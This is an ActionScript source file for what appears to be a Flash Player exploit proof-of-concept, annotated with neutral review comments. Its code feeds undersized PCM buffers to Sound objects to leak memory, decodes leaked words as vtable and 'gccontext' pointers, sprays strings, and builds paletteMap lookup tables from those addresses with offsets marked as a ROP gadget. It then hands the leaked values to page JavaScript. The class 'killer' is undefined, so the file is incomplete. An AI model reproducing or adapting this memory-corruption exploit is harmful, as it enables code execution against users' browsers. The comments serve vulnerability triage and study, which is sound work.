package
|
|
{
|
//import authoring;
|
import flash.display.BitmapData;
|
import flash.display.Sprite;
|
import flash.events.Event;
|
import flash.geom.Point;
|
import flash.geom.Rectangle;
|
import flash.globalization.LocaleID;
|
import flash.media.Sound;
|
import flash.net.URLRequest;
|
import flash.text.TextField;
|
import flash.utils.ByteArray;
|
import flash.display.Loader;
|
import flash.system.Security;
|
import flash.external.ExternalInterface;
|
|
// soundPCM: document class of a Flash proof-of-concept; all work happens in the constructor.
// Visible flow: (1) Sound.loadPCMFromByteArray is called with a buffer shorter than the
// declared sample count, (2) the same Sound is read back with extract() and the samples
// are decoded as raw 16-bit words instead of audio, (3) BitmapData.paletteMap is driven
// with lookup tables built from those words, (4) the words are handed to page JavaScript.
// Review notes:
//  - The distinguishing pattern for triage is a well-formed loadPCMFromByteArray, then an
//    undersized one on the same Sound inside try/catch, then extract() on that Sound.
//  - Statement order (allocations between the loads and the extracts) appears to matter;
//    the page does not document why, so treat the sequence as order-sensitive.
//  - `killer` is referenced below but is not defined in this file.
public class soundPCM extends Sprite
|
{
|
//public var s2;
|
// Constructor: runs the whole sequence once when the SWF is instantiated.
public function soundPCM()
|
{
|
|
// Wildcard: SWFs and HTML pages from any domain are allowed to script into this SWF.
Security.allowDomain("*");
|
var s = new Sound();
|
var b = new ByteArray();
|
// Stage 1a: 504*4 = 2016 bytes, exactly 504 mono 32-bit float samples (well-formed load).
for( var i = 0; i < 504*4; i++){
|
b.writeByte(1);
|
}
|
b.position = 0;
|
s.loadPCMFromByteArray(b, 504, "float", false, 44100.0);
|
var c = new ByteArray();
|
// Stage 1b: only 1010 bytes are supplied, but the call below again declares 504 float
// samples (2016 bytes). Size and declared count do not match.
for(var i = 0; i < 1010; i++){
|
c.writeByte(1);
|
}
|
c.position = 0;
|
// The try/catch suggests the author expects this call to throw; the error is only traced
// and execution continues with the same Sound object.
// NOTE(review): sample rate is 44000.0 here versus 44100.0 elsewhere - intent not stated.
try{
|
s.loadPCMFromByteArray(c, 504, "float", false, 44000.0);
|
}catch(e:Error){
|
trace(e.message);
|
}
|
|
// Read 32 samples back from s, starting at position 0, into d.
// NOTE(review): the code below does not treat the result as the 0x01 fill written above;
// it handles it as pointer-like data.
var d = new ByteArray();
|
s.extract(d, 32, 0);
|
d.position = 0;
|
var t:TextField = new TextField();
|
// lb counts decoded words; it is NOT reset before the second decode loop further down.
var lb = 0;
|
// Holds three 16-bit words captured from the read-back data. The name and the later
// arithmetic imply the author treats them as a native address; the page does not say
// which object it belongs to.
var vtable = [];
|
try{
|
while(true){
|
|
// Decode one float back to an unsigned 16-bit word: scale by 32768, wrap negatives.
var n = d.readFloat() * 32768.0;
|
if (n < 0)
|
n = n + 0x10000;
|
// Hex dump, four words per line (this text is overwritten after the loop).
t.text = t.text + n.toString(16);
|
t.text = t.text + " ";
|
if(lb % 4 == 3){
|
t.text = t.text + "\r\n";
|
}
|
|
lb++;
|
// Keep the 17th, 18th and 19th words read.
if(lb == 17){
|
vtable[0] = n;
|
|
}
|
if(lb == 18){
|
vtable[1] = n;
|
|
}
|
if(lb == 19){
|
vtable[2] = n;
|
|
}
|
|
// Stop after the 20th word.
if(lb == 20){
|
break;
|
|
}
|
|
|
}
|
// Any error (for example d running out of data) is swallowed. If that happens before the
// 19th word, vtable[2] stays undefined and the toString() call below throws uncaught.
}catch(e){
|
|
}
|
|
|
t.width = t.height = 3000;
|
|
// Replaces the hex dump built in the loop with just the three captured words.
t.text = "vtable" + vtable[2].toString(16)+ " " +vtable[1].toString(16) + " " + vtable[0].toString(16);
|
addChild(t);
|
// Build a 4095-character string of "A" ...
var vstr = "";//"i am a temp string, oh yes i am, oh yes i am 324833241832418074384328097234803248907248902434034870330872079483";//"123412341234" + String.fromCharCode(vtable[0], vtable[1], vtable[2], 0);
|
for(var si = 0; si < 4095; si++){
|
|
vstr = vstr + "A";
|
|
}
|
// ... and a Vector with 100 entries that all hold that string.
var v:Vector.<String> = new Vector.<String>();
|
for(var q = 0; q < 100; q++){
|
v.push(vstr);
|
|
|
}
|
|
|
|
// Stage 2a: second Sound, same pattern. 202*4 = 808 bytes = 202 float samples (well-formed).
var s2 = new Sound();
|
var b2 = new ByteArray();
|
for( var i = 0; i < 202*4; i++){
|
b2.writeByte(1);
|
}
|
b2.position = 0;
|
s2.loadPCMFromByteArray(b2, 202, "float", false, 44100.0);
|
var c2 = new ByteArray();
|
// Stage 2b: 302*2+2 = 606 bytes supplied against 302 declared float samples (1208 bytes).
for(var i = 0; i < 302*2+2; i++){
|
c2.writeByte(1);
|
}
|
c2.position = 0;
|
|
|
|
// As in stage 1b, a failure is traced and otherwise ignored.
try{
|
s2.loadPCMFromByteArray(c2, 302, "float", false, 44100.0);
|
}catch(e:Error){
|
trace(e.message);
|
}
|
|
// Same vector passed as both arguments and the return value is discarded, so the call is
// made only for its side effects; the page does not state which ones are relied on.
LocaleID.determinePreferredLocales(v, v);
|
|
|
// Read 202 samples back from s2, starting at position 0.
var d2 = new ByteArray();
|
s2.extract(d2, 202, 0);
|
d2.position = 0;
|
// Sliding window over the decoded words; after the loop it holds the last four words read.
var buf = [0, 0, 0, 0]
|
try{
|
// No break: the loop ends only when readFloat() throws at the end of d2.
while(true){
|
|
// Same float -> unsigned 16-bit decoding as in the first loop.
var n = d2.readFloat() * 32768.0;
|
if (n < 0)
|
n = n + 0x10000;
|
t.text = t.text + n.toString(16);
|
t.text = t.text + " ";
|
// lb continues from the first loop's count, so line breaks are offset accordingly.
if(lb % 16 == 15){
|
t.text = t.text + "\n";
|
}
|
|
lb++;
|
|
// Shift the window left by one and append the newest word.
buf[0] = buf[1];
|
buf[1] = buf[2];
|
buf[2] = buf[3];
|
buf[3] = n;
|
|
}
|
// The end-of-data error from readFloat() is the normal exit path and is swallowed here.
}catch(e){
|
|
}
|
|
|
// 10x10 transparent bitmap with fill value 10; rect covers the whole bitmap, and the
// destination point is (5, 5).
var bmp:BitmapData = new BitmapData(10, 10, true, 10);
|
var rect:Rectangle = new Rectangle(0, 0, 10, 10);
|
var dp:Point = new Point(5, 5);
|
// Four 256-entry channel lookup tables (red, blue, green, alpha by name).
var ra = [];
|
var ba = [];
|
var ga = [];
|
var aa = [];
|
// Fill each table with a recognisable marker in the high half and the index in the low
// half (0x7777 red, 0x9999 blue, 0x8888 green, 0x6666 alpha).
for(var ai = 0; ai < 256; ai++){
|
ra[ai] = 0x77770000 + ai;
|
ba[ai] = 0x99990000 + ai;
|
ga[ai] = 0x88880000 + ai;
|
aa[ai] = 0x66660000 + ai;
|
|
}
|
|
// Selected slots are overwritten in pairs: the odd slot gets buf[2], the even slot gets
// (buf[1] << 16 | buf[0]) plus a fixed offset. The author's "gccontext" tag is the only
// description of what these words are; slot indices and offsets are unexplained.
ra[3] = buf[2]; //gccontext
|
ra[2] = (buf[1] * 0x10000) + buf[0] + 256*4; //gccontext
|
ba[0xcd] = buf[2]; //gccontext
|
ba[0xcc] = (buf[1] * 0x10000) + buf[0] + 512*4; //gccontext
|
aa[0x87] = buf[2]; //gccontext
|
aa[0x86] = (buf[1] * 0x10000) + buf[0] + 256*4; //gccontext
|
ra[0x15] = buf[2]; //gccontext
|
ra[0x14] = (buf[1] * 0x10000) + buf[0] + 256*4 + 0x20; //gccontext
|
ga[0x5b] = buf[2]; //gccontext
|
ga[0x5a] = (buf[1] * 0x10000) + buf[0] + 256*4 + 0x200; //gccontext
|
ra[1] = buf[2]; //gccontext
|
ra[0] = (buf[1] * 0x10000) + buf[0] + 0x40*4; //gccontext
|
// Same pairing for the stage-1 words, with fixed negative offsets. The commented-out
// alternative constants suggest the offsets were tuned per target build (assumption).
ra[0x49] = vtable[2];
|
ra[0x48] = (vtable[1] * 0x10000) + vtable[0] - 5766910; //- 5269070; //rdi to rax gadget
|
// Literal constants; their role is not documented on the page.
ra[0x40] = 0x78656867;
|
ra[0x41] = 0;
|
ra[0x51] = vtable[2];
|
ra[0x50] = (vtable[1] * 0x10000) + vtable[0] - 11965100; //- 11031964;
|
|
ra[0x4b] = vtable[2];
|
ra[0x4a] = (vtable[1] * 0x10000) + vtable[0] - 11965100; //- 11031964;
|
|
|
// Stores an object (class `killer`, not defined in this file) in the last alpha slot;
// the author's stated purpose is below.
aa[255] = new killer(); // prevent array free
|
// 5000 paletteMap calls with bmp as both source and destination. Argument order is
// red, green, blue, alpha -> ra, ga, ba, aa. Errors are traced and the loop continues.
for (var times = 0; times < 5000; times++){
|
try{
|
bmp.paletteMap(bmp,rect, dp, ra, ga, ba, aa);
|
}catch(e:Error){
|
|
trace(e.message);
|
|
}
|
|
}
|
// Nested handler that would load a second SWF from the loopback host with the three
// buf words as query parameters. The only addEventListener reference to it is commented
// out (and names an undeclared `ldr`), so nothing in this file ever calls it.
function startListener (e:Event):void{
|
t.text = "Loading Completed";
|
var ldr2:Loader = new Loader();
|
var url2:String = "http://127.0.0.1/ucrasher49.swf?a=" + buf[2] + "&b=" + buf[1] + "&c=" + buf[0] + "&num=14";
|
var urlReq2:URLRequest = new URLRequest(url2);
|
//ldr.contentLoaderInfo.addEventListener(Event.COMPLETE, startListener);
|
ldr2.load(urlReq2);
|
addChild(ldr2);
|
}
|
|
|
// Show the stage-2 and stage-1 words on screen (replaces the second hex dump).
var bstr = buf[2].toString(16) + " " + buf[1].toString(16) + " " +buf[0].toString(16);
|
t.text = bstr + "\r\n vtable " + vtable[2].toString(16)+ " " +vtable[1].toString(16) + " " + vtable[0].toString(16);
|
// Build a loopback URL carrying the read-back words (buf[0] adjusted by +6) and pass it
// to the hosting page's JavaScript function "sendToJavaScript". This is the point where
// values read out of the Sound object leave the SWF; the trailing "&num=" is left open,
// presumably for the page script to complete.
var url:String = "http://127.0.0.1/ucrasher49.swf?a=" + buf[2] + "&b=" + buf[1] + "&c=" + (buf[0] + 6) + "&num=";
|
ExternalInterface.call("sendToJavaScript", url);
|
|
|
|
}
|
}
|
}
|